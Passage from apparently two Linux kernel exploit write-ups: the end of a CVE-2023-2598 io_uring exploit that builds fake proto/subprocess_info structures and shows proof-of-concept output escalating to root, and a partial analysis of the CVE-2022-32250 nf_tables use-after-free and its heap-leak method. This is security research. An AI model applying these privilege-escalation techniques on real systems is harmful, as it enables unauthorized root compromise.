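The mock subprocess_info also comes out at 96 bytes, matching the size reported in the listing.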

struct proto {
	void                       (*close)(struct sock *, long int); /*     0     8 */
	int                        (*pre_connect)(struct sock *, struct sockaddr *, int); /*     8     8 */
	int                        (*connect)(struct sock *, struct sockaddr *, int); /*    16     8 */
	int                        (*disconnect)(struct sock *, int); /*    24     8 */
	struct sock *              (*accept)(struct sock *, int, int *, bool); /*    32     8 */
	int                        (*ioctl)(struct sock *, int, long unsigned int); /*    40     8 */
	...
};

The only value in proto we need to keep is ioctl as it holds call_usermodehelper_exec. We don’t care about all other values as we won’t be connecting, disconnecting or closing the socket - so we can freely write over those members. This leaves us with 40 bytes free at the start of proto for our path. More than enough :)

Setting up the arguments

We also need to set up our arguments for subprocess_info. Our goal is to execute something like /bin/sh -c /bin/sh &>/dev/ttyS0 </dev/ttyS0. Let’s break it down.

/bin/sh -c /bin/sh &>/dev/ttyS0 </dev/ttyS0

We are essentially asking /bin/sh to spawn us another /bin/sh process, but we redirect its stdin, stdout and stderr to our virtual console/serial port.

However, all of those strings need to go somewhere. We already established that path will need to go at the start of proto but there isn’t enough space there for all of those strings. A convenient location for them is overlapping with inet_sock / inet_connection_sock / tcp_sock after sock proper. There we can write both the strings and the argv array of pointers.

This though, presents another problem. In order to set up argv we need to know the addresses in memory of all the arguments we set up. So aside from KASLR, we need to also leak the address of our sock object in memory so we can calculate the location at which our arguments are.

Two members of sock from which we can obtain a self-pointer are sk_error_queue and sk_receive_queue - both are heads of doubly linked lists. While a list is empty, its head is the only node in it and therefore contains pointers to itself. It should be said that while I observed that both lists were empty, sk_error_queue is described in the documentation as “rarely used” - so it is the wiser choice for the leak.

After obtaining the address of our sock structure in memory, the rest is just a simple matter of calculating offsets.
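
Why an empty list head doubles as a self-pointer can be seen in a tiny model. The types and helpers below are hypothetical; only the offset of 192 bytes is taken from the position of sk_error_queue in the struct sock listing above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical miniature of a circular doubly linked list head. */
struct model_list_head {
	struct model_list_head *next;
	struct model_list_head *prev;
};

struct model_object {
	char other_fields[192];              /* offset of sk_error_queue in the listing */
	struct model_list_head error_queue;
};

/* An empty circular list points back at its own head. */
static void model_list_init(struct model_list_head *h)
{
	h->next = h;
	h->prev = h;
}

/* Given the leaked `next` pointer of an empty list, recover the object base. */
static uintptr_t object_base_from_leak(uintptr_t leaked_next)
{
	return leaked_next - offsetof(struct model_object, error_queue);
}
```

Once the base is known, the address of anything written at a fixed offset inside the object follows by adding that offset back.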

Setting up subprocess_info

Let’s see how we are going to set the subprocess_info to escalate.

work.data          <-> set to 0
work.entry.next    <-> set to its own address
work.entry.prev    <-> set to the address of work.entry.next
work.func          <-> set to call_usermodehelper_exec_work
complete           <-> irrelevant
path               <-> don't overwrite or overwrite it with the same value
argv               <-> write the address where the argv array was set up
envp               <-> set to 0, we have no env variables
wait               <-> irrelevant
retval             <-> irrelevant
*init              <-> set to 0
*cleanup           <-> set to 0
data               <-> irrelevant

We must set work.func to call_usermodehelper_exec_work. Remember that we set proto->ioctl to call_usermodehelper_exec. The function call_usermodehelper_exec is responsible for queuing our deferred work, while call_usermodehelper_exec_work is called later to handle that work - so call_usermodehelper_exec_work is the function that actually spawns our new process.

We write path to remain the same, the address of our proto structure.

After this is done, making an ioctl call to our socket to spawn our new shell is all that is left :)

Proof of Concept

Due to the astonishing primitive that this vulnerability gives us, the proof of concept is extremely reliable by nature.

$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ ./exploit
[*] CVE-2023-2598 Exploit by anatomic (@YordanStoychev)
memfd: 0, page: 0 at virt_addr: 0x4247000000, reading 266240000 bytes
memfd: 0, page: 500 at virt_addr: 0x42470001f4, reading 266240000 bytes
memfd: 0, page: 1000 at virt_addr: 0x42470003e8, reading 266240000 bytes
memfd: 0, page: 1500 at virt_addr: 0x42470005dc, reading 266240000 bytes
memfd: 0, page: 2000 at virt_addr: 0x42470007d0, reading 266240000 bytes
memfd: 0, page: 2500 at virt_addr: 0x42470009c4, reading 266240000 bytes
memfd: 0, page: 3000 at virt_addr: 0x4247000bb8, reading 266240000 bytes
memfd: 0, page: 3500 at virt_addr: 0x4247000dac, reading 266240000 bytes
memfd: 0, page: 4000 at virt_addr: 0x4247000fa0, reading 266240000 bytes
memfd: 0, page: 4500 at virt_addr: 0x4247001194, reading 266240000 bytes
memfd: 0, page: 5000 at virt_addr: 0x4247001388, reading 266240000 bytes
memfd: 0, page: 5500 at virt_addr: 0x424700157c, reading 266240000 bytes
memfd: 0, page: 6000 at virt_addr: 0x4247001770, reading 266240000 bytes
memfd: 0, page: 6500 at virt_addr: 0x4247001964, reading 266240000 bytes
memfd: 0, page: 7000 at virt_addr: 0x4247001b58, reading 266240000 bytes
memfd: 0, page: 7500 at virt_addr: 0x4247001d4c, reading 266240000 bytes
memfd: 0, page: 8000 at virt_addr: 0x4247001f40, reading 266240000 bytes
memfd: 0, page: 8500 at virt_addr: 0x4247002134, reading 266240000 bytes
memfd: 0, page: 9000 at virt_addr: 0x4247002328, reading 266240000 bytes
memfd: 0, page: 9500 at virt_addr: 0x424700251c, reading 266240000 bytes
memfd: 0, page: 10000 at virt_addr: 0x4247002710, reading 266240000 bytes
memfd: 0, page: 10500 at virt_addr: 0x4247002904, reading 266240000 bytes
memfd: 0, page: 11000 at virt_addr: 0x4247002af8, reading 266240000 bytes
memfd: 0, page: 11500 at virt_addr: 0x4247002cec, reading 266240000 bytes
memfd: 0, page: 12000 at virt_addr: 0x4247002ee0, reading 266240000 bytes
memfd: 0, page: 12500 at virt_addr: 0x42470030d4, reading 266240000 bytes
Found value 0xdeadbeefdeadbeef at offset 0x21c8
Socket object starts at offset 0x2000
kaslr_leak: 0xffffffffb09503f0
kaslr_base: 0xffffffffafe00000
found socket is socket number 1950
our struct sock object starts at 0xffff9817ff400000
fake proto structure set up at 0xffff9817ff400578
args at 0xffff9817ff400728
argv at 0xffff9817ff400750
subprocess_info set up at beginning of sock at 0xffff9817ff400000
calling ioctl...
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # w00t w00t

You can find my Proof of Concept - here.

Acknowledgements 
Tobias Holl, for outstanding research, discovering the vulnerability and PoC’ing it. I took the idea of using the pacing rate of the socket as an egg from him :)

Valentina Palmiotti (chompie), for her amazing introduction to the io_uring subsystem in her article, Put an io_uring on it - Exploiting the Linux Kernel.



Conquering a Use-After-Free in nf_tables: Detailed Analysis and Exploitation of CVE-2022-32250
2023-02-04T14:00:00+00:00
Introduction
This article is a summary of the research I recently conducted on CVE-2022-32250.
Some (but not all) of my analysis and the process of exploiting the vulnerability were done live and can be found here.

My research sprung up from the write-up by theori.io. I found their article extremely insightful and perfect for those who seek an overview of the vulnerability and the way it is exploited. Kudos to them!

In this write-up, I will be providing an in-depth look into the vulnerability and the way it is exploited.

As this is a Netfilter vulnerability I recommend reading my article that provides an introduction to the inner workings of nf_tables. However, I will try to cover everything you need to know.

Table of Contents

  Background
    Sets
    Lookup Expression
  The Vulnerability
    Root Cause
  Exploitation
    Requirements
    Leaking a heap address
      Method of Exploitation
      Searching for a primitive
        struct user_key_payload
    Defeating KASLR
      Technique
      Leaking an address
      Summarizing the KASLR leak process
    Escalating via a modprobe_path overwrite
      Method of Exploitation
      Overwriting modprobe_path
  Proof-of-Concept
  Closing Remarks


Background 
Before we take a look at the root cause we need to look at some background information that is needed to understand the vulnerability.

Sets 
nf_tables makes use of so-called sets. Their range of uses is vast, but to simplify and generalize heavily - they are a fancy key-value store that sometimes acts as a plain list.

A quick example of set usage: imagine you have a list of ports (22, 80, 443). If you want to drop all packets arriving on those ports, you add the ports to a set and then use an nft_lookup expression to check whether the incoming packet’s port number is part of the set - and if so, drop it.
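Stripped of everything nf_tables-specific, the idea looks roughly like the toy program below. It is not how the kernel implements sets; the names and the linear search are purely illustrative.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

enum verdict { VERDICT_ACCEPT, VERDICT_DROP };

/* The "set": ports on which packets should be dropped. */
static const uint16_t blocked_ports[] = { 22, 80, 443 };

/* The "lookup": is the key present in the set? */
bool set_contains(const uint16_t *set, size_t n, uint16_t key)
{
    for (size_t i = 0; i < n; i++)
        if (set[i] == key)
            return true;
    return false;
}

/* The "rule": drop the packet if its destination port is in the set. */
enum verdict filter_packet(uint16_t dst_port)
{
    size_t n = sizeof(blocked_ports) / sizeof(blocked_ports[0]);

    return set_contains(blocked_ports, n, dst_port) ? VERDICT_DROP
                                                    : VERDICT_ACCEPT;
}
```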

/**
 * 	struct nft_set - nf_tables set instance
 *
 *	@list: table set list node
 *	@bindings: list of set bindings
 *	@table: table this set belongs to
 *	@net: netnamespace this set belongs to
 * 	@name: name of the set
 *	@handle: unique handle of the set
 * 	@ktype: key type (numeric type defined by userspace, not used in the kernel)
 * 	@dtype: data type (verdict or numeric type defined by userspace)
 * 	@objtype: object type (see NFT_OBJECT_* definitions)
 * 	@size: maximum set size
 *	@field_len: length of each field in concatenation, bytes
 *	@field_count: number of concatenated fields in element
 *	@use: number of rules references to this set
 * 	@nelems: number of elements
 * 	@ndeact: number of deactivated elements queued for removal
 *	@timeout: default timeout value in jiffies
 * 	@gc_int: garbage collection interval in msecs
 *	@policy: set parameterization (see enum nft_set_policies)
 *	@udlen: user data length
 *	@udata: user data
 *	@expr: stateful expression
 * 	@ops: set ops
 * 	@flags: set flags
 *	@genmask: generation mask
 * 	@klen: key length
 * 	@dlen: data length
 * 	@data: private set data
 */
struct nft_set {
	struct list_head		list;
	struct list_head		bindings;
	struct nft_table		*table;
	possible_net_t			net;
	char				*name;
	u64				handle;
	u32				ktype;
	u32				dtype;
	u32				objtype;
	u32				size;
	u8				field_len[NFT_REG32_COUNT];
	u8				field_count;
	u32				use;
	atomic_t			nelems;
	u32				ndeact;
	u64				timeout;
	u32				gc_int;
	u16				policy;
	u16				udlen;
	unsigned char			*udata;
	/* runtime data below here */
	const struct nft_set_ops	*ops ____cacheline_aligned;
	u16				flags:14,
					genmask:2;
	u8				klen;
	u8				dlen;
	u8				num_exprs;
	struct nft_expr			*exprs[NFT_SET_EXPR_MAX];
	struct list_head		catchall_list;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(u64))));
};

Two things are important to note here: expressions can be attached to a set through exprs, and the set keeps a linked list called bindings.

Lookup Expression 
We already mentioned the existence of the nft_lookup expression… But what does it do?
The lookup expression is used to perform lookups into sets to check if a key or a value is present in the set.

Essentially in the example we provided after you set up your set with ports on which you want to drop packets, you will set up a lookup expression to perform the check on the incoming packets.

struct nft_lookup {
	struct nft_set			*set;
	u8				sreg;
	u8				dreg;
	bool				invert;
	struct nft_set_binding		binding;
};

The member set holds a pointer to the set in which the lookup is going to be performed. sreg holds the index of the register from which the key we are looking up is loaded, and dreg is the index of the register where the value is stored after the lookup if the key exists.
The final member is binding.
struct nft_set_binding {
	struct list_head		list;
	const struct nft_chain		*chain;
	u32				flags;
};

Each lookup expression has a binding which contains a pointer to the nft_chain to which it belongs (if it belongs to a chain). It also contains a list_head. All of the expressions that look up into a set are linked with each other (and with the set) through their bindings (and the set’s bindings member).

So if we have two lookup expressions lookup1 and lookup2 that look up into a set called set1 they would all be in a linked list.
/* In case needed for clarity:
set1.bindings.next = lookup1.binding
lookup1.binding.next = lookup2.binding
lookup2.binding.next = set1.bindings

lookup2.binding.prev = lookup1.binding
lookup1.binding.prev = set1.bindings
set1.bindings.prev = lookup2.binding
*/
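If you want to convince yourself of that layout, the following userspace model rebuilds the ring with a minimal copy of the kernel's circular list logic. The model_set and model_lookup types are stand-ins I made up for the sketch; only the list handling mirrors what the kernel does.

```c
#include <assert.h>

struct list_head { struct list_head *next, *prev; };

/* An empty circular list points at itself. */
void init_list_head(struct list_head *head)
{
    head->next = head;
    head->prev = head;
}

/* Insert node right before head, i.e. at the tail of the ring. */
void list_add_tail(struct list_head *node, struct list_head *head)
{
    struct list_head *last = head->prev;

    node->next = head;
    node->prev = last;
    last->next = node;
    head->prev = node;
}

struct model_set    { struct list_head bindings; };
struct model_lookup { struct list_head binding; };

/* Returns 1 when the ring matches the layout from the comment above. */
int bindings_ring_is_consistent(void)
{
    struct model_set set1;
    struct model_lookup lookup1, lookup2;

    init_list_head(&set1.bindings);
    list_add_tail(&lookup1.binding, &set1.bindings);
    list_add_tail(&lookup2.binding, &set1.bindings);

    return set1.bindings.next == &lookup1.binding &&
           lookup1.binding.next == &lookup2.binding &&
           lookup2.binding.next == &set1.bindings &&
           lookup2.binding.prev == &lookup1.binding &&
           lookup1.binding.prev == &set1.bindings &&
           set1.bindings.prev == &lookup2.binding;
}
```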


The Vulnerability 

  A use-after-free vulnerability was found in the Linux kernel’s Netfilter subsystem in net/netfilter/nf_tables_api.c. This flaw allows a local attacker with user access to cause a privilege escalation issue.


Root Cause 
The problem arises when we add an nft_lookup expression to a set. To add a lookup expression to a set you have to use the NFT_MSG_NEWSET callback that calls the function nf_tables_newset.
nf_tables_newset
	nft_set_elem_expr_alloc
		nft_expr_init

nf_tables_newset calls nft_set_elem_expr_alloc which calls nft_expr_init.

Let’s take a deeper look at the nft_expr_init function.
static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
                      const struct nlattr *nla)
{
    struct nft_expr_info expr_info;
    struct nft_expr *expr;
    struct module *owner;
    int err;

    err = nf_tables_expr_parse(ctx, nla, &expr_info); 
    if (err < 0)
        goto err1;

    err = -ENOMEM;
    expr = kzalloc(expr_info.ops->size, GFP_KERNEL); // GFP_KERNEL space 
    if (expr == NULL)
        goto err2;

    err = nf_tables_newexpr(ctx, &expr_info, expr); // [1]
    // the full initialization of the expression failed
    if (err < 0) 
        goto err3; // free *expr

    return expr;
err3:
    kfree(expr);
err2:
    owner = expr_info.ops->type->owner;
    if (expr_info.ops->type->release_ops)
        expr_info.ops->type->release_ops(expr_info.ops);

    module_put(owner);
err1:
    return ERR_PTR(err);
}

At [1] it calls the function nf_tables_newexpr to fully initialize the expression. If that fails, it frees the expression.
static int nf_tables_newexpr(const struct nft_ctx *ctx,
                 const struct nft_expr_info *expr_info,
                 struct nft_expr *expr)
{
    const struct nft_expr_ops *ops = expr_info->ops;
    int err;

    expr->ops = ops; // sets the ops of the expression to those expr_info->ops;
    if (ops->init) {
        // expression-specific initialization
        err = ops->init(ctx, expr, (const struct nlattr **)expr_info->tb); // [2]
        if (err < 0)
            goto err1;
    }

    return 0;
err1:
    expr->ops = NULL;
    return err;
}

At [2] we see that the expression specific ops->init function gets called and if it fails it returns the error to the caller - nft_expr_init. 
Each type of expression has its own nft_expr_ops defined. Let’s take a look at the ops of the lookup expression as we are talking about it.
static const struct nft_expr_ops nft_lookup_ops = {
	.type		= &nft_lookup_type,
	.size		= NFT_EXPR_SIZE(sizeof(struct nft_lookup)),
	.eval		= nft_lookup_eval,
	.init		= nft_lookup_init,
	.activate	= nft_lookup_activate,
	.deactivate	= nft_lookup_deactivate,
	.destroy	= nft_lookup_destroy,
	.dump		= nft_lookup_dump,
	.validate	= nft_lookup_validate,
	.reduce		= nft_lookup_reduce,
};

Here we can see that ops->init of the lookup expression is nft_lookup_init.
static int nft_lookup_init(const struct nft_ctx *ctx,
               const struct nft_expr *expr,
               const struct nlattr * const tb[])
{
    struct nft_lookup *priv = nft_expr_priv(expr); 
    u8 genmask = nft_genmask_next(ctx->net);
    struct nft_set *set;
    u32 flags;
    int err;

    if (tb[NFTA_LOOKUP_SET] == NULL ||
        tb[NFTA_LOOKUP_SREG] == NULL)
        return -EINVAL;

		// sets up nft_set
    set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
                    tb[NFTA_LOOKUP_SET_ID], genmask);
    if (IS_ERR(set))
        return PTR_ERR(set);

    ...
		// gets the flags 
    priv->binding.flags = set->flags & NFT_SET_MAP;

		// attempts to bind the expression to the set
    err = nf_tables_bind_set(ctx, set, &priv->binding); // [1]
    if (err < 0)
        return err;

    priv->set = set; 
    return 0;
}
int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
               struct nft_set_binding *binding)
{
    struct nft_set_binding *i;
    struct nft_set_iter iter;

    if (set->use == UINT_MAX)
        return -EOVERFLOW;

    if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
        return -EBUSY;

    ...

bind:                          
    binding->chain = ctx->chain;
    list_add_tail_rcu(&binding->list, &set->bindings);
    nft_set_trans_bind(ctx, set);
    set->use++;

    return 0;
}

At [1] we can see that it calls the function nf_tables_bind_set to bind the expression to the set. In nf_tables_bind_set we can see that binding fails with -EBUSY if the set is anonymous and its bindings list is not empty. So for additional bindings to succeed, the set that we are performing the lookup on shouldn’t be anonymous.

  If we want a set to be non-anonymous we can just not set the anonymous flag when creating it.


We already established that when adding an expression to a set the nft_expr_init function gets called by nft_set_elem_expr_alloc. Let’s take a look at it.

struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                     const struct nft_set *set,
                     const struct nlattr *attr)
{
    struct nft_expr *expr;
    int err;

    expr = nft_expr_init(ctx, attr); // [1]
    if (IS_ERR(expr))
        return expr;

    err = -EOPNOTSUPP;
    if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL)) // [2]
        goto err_set_elem_expr;

    if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;
        if (!set->ops->gc_init)
            goto err_set_elem_expr;
        set->ops->gc_init(set);
    }

    return expr;

err_set_elem_expr:
    nft_expr_destroy(ctx, expr); // [3]
    return ERR_PTR(err);
}

void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
    nf_tables_expr_destroy(ctx, expr);
    kfree(expr);
}

static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
                   struct nft_expr *expr)
{
    const struct nft_expr_type *type = expr->ops->type;

    if (expr->ops->destroy)
        expr->ops->destroy(ctx, expr); // [4]
    module_put(type->owner);
}

At [1] we can see the call to nft_expr_init that eventually results in the lookup expression being bound to the set. At [2] we can see that a check is performed to see if the flag NFT_EXPR_STATEFUL is present and if not it calls nft_expr_destroy. nft_expr_destroy itself calls nf_tables_expr_destroy which calls the expression-specific ops->destroy function.

Let’s look at the lookup expression’s destroy function - nft_lookup_destroy.
static void nft_lookup_destroy(const struct nft_ctx *ctx,
                   const struct nft_expr *expr)
{
    struct nft_lookup *priv = nft_expr_priv(expr);

    nf_tables_destroy_set(ctx, priv->set); // [1]
}

void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
    if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) // [2]
        nft_set_destroy(ctx, set); 
}

At [1] in nft_lookup_destroy a call is made to nf_tables_destroy_set to destroy the set the expression was bound to, if possible. At [2] a check is performed to see if it is safe to destroy the set - that is, if the bindings are empty and the set is anonymous. The set won’t be destroyed if it is named or if it has any bindings - and it will always have at least one binding because the expression got bound to it prior to being destroyed.

So the problem is that in the function nft_set_elem_expr_alloc the call to nft_expr_init is performed before it is checked if the expression has the NFT_EXPR_STATEFUL flag. This means that if an expression without the stateful flag is passed, the expression will be fully initialized and bound to the set first, and only then destroyed because the flag is missing.

So what happens when we pass an expression without NFT_EXPR_STATEFUL? The expression will get bound to the set before the expression gets destroyed. However, the set that it is bound to won’t get destroyed because its bindings are not empty. And as we see in the functions above there is no handling in this case. The expression already got bound to the set and it will stay bound. A pointer to it will remain in the bindings linked list of the set even though the expression got destroyed and its memory got freed. So now the linked list at set->bindings contains a pointer to freed memory. A Use-After-Free arises.
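The ordering problem can be modeled in userspace without touching any real freed memory. In the sketch below, a freed flag stands in for kfree, alloc_buggy follows the bind-then-check order described above, and alloc_checked shows that simply checking the flag first never leaves a stale node behind. All names are mine and the model is heavily simplified.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

struct model_expr {
    bool stateful;            /* stands in for NFT_EXPR_STATEFUL */
    bool freed;               /* stands in for kfree(); nothing is really freed */
    struct list_head binding;
};

static void list_add_tail(struct list_head *node, struct list_head *head)
{
    struct list_head *last = head->prev;

    node->next = head;
    node->prev = last;
    last->next = node;
    head->prev = node;
}

/* Buggy order: bind first, check the flag afterwards, never unlink. */
bool alloc_buggy(struct list_head *bindings, struct model_expr *e)
{
    list_add_tail(&e->binding, bindings);   /* init binds to the set */
    if (!e->stateful) {
        e->freed = true;                    /* destroy frees the expression */
        return false;
    }
    return true;
}

/* Check-first order: a non-stateful expression is rejected before binding. */
bool alloc_checked(struct list_head *bindings, struct model_expr *e)
{
    if (!e->stateful) {
        e->freed = true;
        return false;
    }
    list_add_tail(&e->binding, bindings);
    return true;
}

/* True when the list still references an expression marked as freed. */
bool has_dangling(const struct list_head *bindings)
{
    const struct list_head *p;

    for (p = bindings->next; p != bindings; p = p->next) {
        const struct model_expr *e = (const struct model_expr *)
            ((const char *)p - offsetof(struct model_expr, binding));
        if (e->freed)
            return true;
    }
    return false;
}
```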

Exploitation 
The way this vulnerability is exploited depends on the kernel version of the target. 
If the target is older than version 5.14, there are only the kmalloc- (KMALLOC_NORMAL) slab caches. From 5.14 onward, there are two different types of caches - one for accounted objects and one for unaccounted ones. Accounted objects are allocated using the flag GFP_KERNEL_ACCOUNT and they go to the kmalloc-cg- (KMALLOC_CGROUP) caches. Unaccounted objects use the old flag GFP_KERNEL and go into the legacy kmalloc- caches. This is important because in later versions, where separate caches are present for accounted and unaccounted objects, the nft_lookup expression is still unaccounted, i.e. it gets allocated with the flag GFP_KERNEL. Therefore, in order to exploit the Use-After-Free vulnerability, the objects that we are going to use as primitives must also be allocated with the GFP_KERNEL flag in versions that use the new kmalloc-cg- caches.

My goal was to write a version-agnostic exploit. To do that I only used objects that are still allocated with GFP_KERNEL even on newer versions. This way the exploit is viable with the older and newer cache implementations.
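The rule I am applying can be written down as a tiny decision function. It is a deliberate simplification (it ignores the reclaimable and DMA cache families entirely), and both function names are invented for the sketch.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Simplified model: which cache family serves an allocation.
 * has_cg_caches is true on kernels that have the kmalloc-cg- caches,
 * accounted is true for GFP_KERNEL_ACCOUNT allocations. */
const char *cache_family(bool has_cg_caches, bool accounted)
{
    if (has_cg_caches && accounted)
        return "kmalloc-cg-";
    return "kmalloc-";
}

/* A spray object can only reclaim the victim's slot if both objects
 * are served from the same cache family. */
bool can_share_cache(bool has_cg_caches, bool victim_accounted,
                     bool spray_accounted)
{
    return strcmp(cache_family(has_cg_caches, victim_accounted),
                  cache_family(has_cg_caches, spray_accounted)) == 0;
}
```

With an unaccounted victim such as nft_lookup, an unaccounted spray object passes the check on both old and new kernels, which is exactly the property the exploit relies on.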

The exploit can be divided into three essential stages - leaking a heap address, leaking KASLR and overwriting modprobe_path to escalate our privileges.


  It’s important to note that the exploit was tested on 5.12.0 as this was what I had lying around. Version 5.12 predates the introduction of the kmalloc-cg- caches.


Requirements 
To be able to exploit the vulnerability you need CAP_NET_ADMIN. That shouldn’t be a problem in most cases as that capability can be obtained in a user+net namespace. So our only requirement is that we can create user and network namespaces.
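A minimal sketch of entering such a user+net namespace is shown below. It uses the raw unshare syscall so that it does not depend on feature-test macros, and it maps the current uid and gid to root inside the namespace. The helper names are mine; on systems where unprivileged user namespaces are disabled the function simply returns -1.

```c
#include <assert.h>
#include <fcntl.h>
#include <linux/sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Write a short string to an existing file; 0 on success, -1 on failure. */
static int write_file(const char *path, const char *text)
{
    ssize_t written;
    int fd = open(path, O_WRONLY);

    if (fd < 0)
        return -1;
    written = write(fd, text, strlen(text));
    close(fd);
    return written == (ssize_t)strlen(text) ? 0 : -1;
}

/* Enter new user and network namespaces and become root inside them.
 * Returns 0 on success, -1 if the namespaces could not be set up. */
int enter_user_net_ns(void)
{
    char map[64];
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (syscall(SYS_unshare, (long)(CLONE_NEWUSER | CLONE_NEWNET)) != 0)
        return -1;

    /* Needed before gid_map can be written by an unprivileged process.
     * The result is ignored on purpose: the file may not exist. */
    write_file("/proc/self/setgroups", "deny");

    snprintf(map, sizeof(map), "0 %u 1", (unsigned int)uid);
    if (write_file("/proc/self/uid_map", map) != 0)
        return -1;

    snprintf(map, sizeof(map), "0 %u 1", (unsigned int)gid);
    if (write_file("/proc/self/gid_map", map) != 0)
        return -1;

    return 0;
}
```

After a successful call the process holds CAP_NET_ADMIN over its own network namespace, which is all nf_tables asks for.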

Leaking a heap address 
It is essential to be able to leak a heap address as we are going to need one to successfully fool the kernel and bypass some security protections in the KASLR leaking stage but more on that later. Let’s now look into how we are going to leak the heap address.

We already established that the Use-After-Free occurs because we are left with a pointer to the binding of an nft_lookup expression that has been freed. 
Every expression in nf_tables is of the abstract type nft_expr.
/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */
struct nft_expr {
	const struct nft_expr_ops	*ops; // nft_lookup_ops in our case (8 bytes)
	unsigned char			data[] // this holds the nft_lookup object 
		__attribute__((aligned(__alignof__(u64)))); // aligned 8 bytes
};

struct nft_lookup {
	struct nft_set			*set; // @8 (8 bytes) 
	u8				sreg; // @16 (1 byte)
	u8				dreg; // @17 (1 byte)
	bool				invert; // @18 (also takes at least a byte)
	struct nft_set_binding		binding; // @24 (32 bytes including tail padding)
	// @24 because the binding starts with pointers and must be 8-byte aligned
};

struct nft_set_binding {
	struct list_head		list; // @24; (2 pointers - 16 bytes)
	const struct nft_chain		*chain; // @40 (8 bytes)
	u32				flags; // @48 (4 bytes)
};


Here the data in nft_expr holds struct nft_lookup. The members of struct nft_expr, whenever it holds an expression of type nft_lookup, end at offset 0x34 = 52 bytes (56 bytes once trailing padding is counted). Either way, this indicates allocation in kmalloc-64.
Therefore we are looking for primitives also in kmalloc-64 that are being allocated with GFP_KERNEL on versions with separate slab caches.
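The size class can be double-checked with a userspace mirror of the layout. The structs below are my own stand-ins with the same member order as the listings above, assuming a 64-bit build. The compiler reports 56 bytes because it counts the trailing padding after flags, while the members themselves end at 52. kmalloc_bucket is a simplified model of the general-purpose size classes, not kernel code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct list_head { struct list_head *next, *prev; };

/* Mirror of nft_set_binding (assumed 64-bit layout). */
struct model_binding {
    struct list_head list;
    const void *chain;
    uint32_t flags;
};

/* Mirror of nft_expr with the nft_lookup private data inlined. */
struct model_lookup_expr {
    const void *ops;
    void *set;
    uint8_t sreg;
    uint8_t dreg;
    _Bool invert;
    struct model_binding binding;
};

/* Smallest general-purpose kmalloc size class that fits the request,
 * or 0 if the request is larger than this simplified table. */
size_t kmalloc_bucket(size_t size)
{
    static const size_t buckets[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    for (size_t i = 0; i < sizeof(buckets) / sizeof(buckets[0]); i++)
        if (size <= buckets[i])
            return buckets[i];
    return 0;
}
```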

Method of Exploitation 
In order to leak a heap address we have to trigger the writing of a heap address into the freed memory object. That is trivially done by adding two nft_lookup expressions one after the other that target the same set. Let’s call those two lookup expressions Object 1 and Object 2.
As we already established, all the lookup expressions that target a certain set are in a linked list through their bindings. 
If we add a lookup expression without the NFT_EXPR_STATEFUL flag it will get bound to the set through its binding and then freed - this is our Object 1. Now if we add a second lookup expression (Object 2) that targets the same set it will also be added to the same linked list. Therefore now the set and both of these lookup expressions are in a linked list together. This means that the binding.next pointer of Object 1 is going to hold the address of the binding of Object 2. However, as we know Object 1 got freed prior to the allocation of Object 2. Therefore if we allocate an object we control (Fake Object 1) in the same space in memory where Object 1 got previously allocated now we have control over the memory where Object 1 is supposed to be. Consequently when Object 2 gets added the kernel thinks it is writing its address to the binding.next of Object 1 but in reality, it is writing it somewhere in the scope of Fake Object 1 that we control and can read from.

Important to mention here that the object we choose to allocate as Fake Object 1 must be kmalloc-64 and be allocated with GFP_KERNEL.

Summarizing:

  Allocate a lookup expression (Object 1) without the NFT_EXPR_STATEFUL flag targeting Set 1. It will get bound to the set and then freed.
  Initiate an object under our control (Fake Object 1) that will get allocated at the same memory allocation where Object 1 was allocated.
  Add another lookup expression (Object 2) that also targets Set 1. Now Object 1.binding and Object 2.binding are in a linked list. However Object 1 doesn’t exist anymore so actually the address of Object 2.binding is written in the scope of Fake Object 1.
  Read Fake Object 1 and leak the address of Object 2.
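The four steps can be replayed in a harmless userspace simulation. Two 64-byte structs play the role of the slab slots, a memset plays the role of our Fake Object 1 reclaiming the first slot, and the list insertion is the same pointer shuffle the kernel performs. Nothing here talks to the kernel; it assumes a 64-bit build and only shows where the pointer ends up.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

struct list_head { struct list_head *next, *prev; };

/* One 64-byte slot viewed as a lookup expression: binding sits at 0x18. */
struct model_expr {
    uint64_t ops;
    uint64_t set;
    uint64_t regs;
    struct list_head binding;
    uint64_t rest[3];
};

static void list_add_tail(struct list_head *node, struct list_head *head)
{
    struct list_head *last = head->prev;

    node->next = head;
    node->prev = last;
    last->next = node;   /* this write lands in the previous tail node */
    head->prev = node;
}

/* Replays the leak and returns the 8 bytes found at offset 0x18 of slot1. */
uint64_t simulate_heap_leak(struct list_head *bindings,
                            struct model_expr *slot1,
                            struct model_expr *slot2)
{
    uint64_t leaked;

    /* Step 1: Object 1 is bound and "freed" without being unlinked. */
    list_add_tail(&slot1->binding, bindings);

    /* Step 2: Fake Object 1 reclaims the slot and fills it with our data. */
    memset(slot1, 'A', sizeof(*slot1));

    /* Step 3: Object 2 is bound; the stale tail gets its next pointer set. */
    list_add_tail(&slot2->binding, bindings);

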